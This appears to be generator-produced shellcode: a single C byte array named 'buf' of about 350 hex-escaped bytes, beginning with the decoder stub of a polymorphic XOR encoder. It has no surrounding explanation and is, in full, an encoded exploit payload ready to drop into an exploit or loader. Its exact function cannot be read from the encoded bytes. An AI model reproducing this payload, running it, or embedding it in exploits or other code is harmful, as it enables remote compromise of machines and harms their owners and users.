unsigned char buf[] = 
"\xda\xca\xd9\x74\x24\xf4\x5a\xbe\x15\xac\x2d\xe9\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x72\x13\x03\x67\xbf\xcf\x1c\x7b\x57\x8d"
"\xdf\x83\xa8\xf2\x56\x66\x99\x32\x0c\xe3\x8a\x82\x46\xa1\x26"
"\x68\x0a\x51\xbc\x1c\x83\x56\x75\xaa\xf5\x59\x86\x87\xc6\xf8"
"\x04\xda\x1a\xda\x35\x15\x6f\x1b\x71\x48\x82\x49\x2a\x06\x31"
"\x7d\x5f\x52\x8a\xf6\x13\x72\x8a\xeb\xe4\x75\xbb\xba\x7f\x2c"
"\x1b\x3d\x53\x44\x12\x25\xb0\x61\xec\xde\x02\x1d\xef\x36\x5b"
"\xde\x5c\x77\x53\x2d\x9c\xb0\x54\xce\xeb\xc8\xa6\x73\xec\x0f"
"\xd4\xaf\x79\x8b\x7e\x3b\xd9\x77\x7e\xe8\xbc\xfc\x8c\x45\xca"
"\x5a\x91\x58\x1f\xd1\xad\xd1\x9e\x35\x24\xa1\x84\x91\x6c\x71"
"\xa4\x80\xc8\xd4\xd9\xd2\xb2\x89\x7f\x99\x5f\xdd\x0d\xc0\x37"
"\x12\x3c\xfa\xc7\x3c\x37\x89\xf5\xe3\xe3\x05\xb6\x6c\x2a\xd2"
"\xb9\x46\x8a\x4c\x44\x69\xeb\x45\x83\x3d\xbb\xfd\x22\x3e\x50"
"\xfd\xcb\xeb\xf7\xad\x63\x44\xb8\x1d\xc4\x34\x50\x77\xcb\x6b"
"\x40\x78\x01\x04\xeb\x83\xc2\x21\xe5\x8a\x63\x5e\xf7\x8c\x92"
"\xc2\x7e\x6a\xfe\xea\xd6\x25\x97\x93\x72\xbd\x06\x5b\xa9\xb8"
"\x09\xd7\x5e\x3d\xc7\x10\x2a\x2d\xb0\xd0\x61\x0f\x17\xee\x5f"
"\x27\xfb\x7d\x04\xb7\x72\x9e\x93\xe0\xd3\x50\xea\x64\xce\xcb"
"\x44\x9a\x13\x8d\xaf\x1e\xc8\x6e\x31\x9f\x9d\xcb\x15\x8f\x5b"
"\xd3\x11\xfb\x33\x82\xcf\x55\xf2\x7c\xbe\x0f\xac\xd3\x68\xc7"
"\x29\x18\xab\x91\x35\x75\x5d\x7d\x87\x20\x18\x82\x28\xa5\xac"
"\xfb\x54\x55\x52\xd6\xdc\x75\xb1\xf2\x28\x1e\x6c\x97\x90\x43"
"\x8f\x42\xd6\x7d\x0c\x66\xa7\x79\x0c\x03\xa2\xc6\x8a\xf8\xde"
"\x57\x7f\xfe\x4d\x57\xaa";
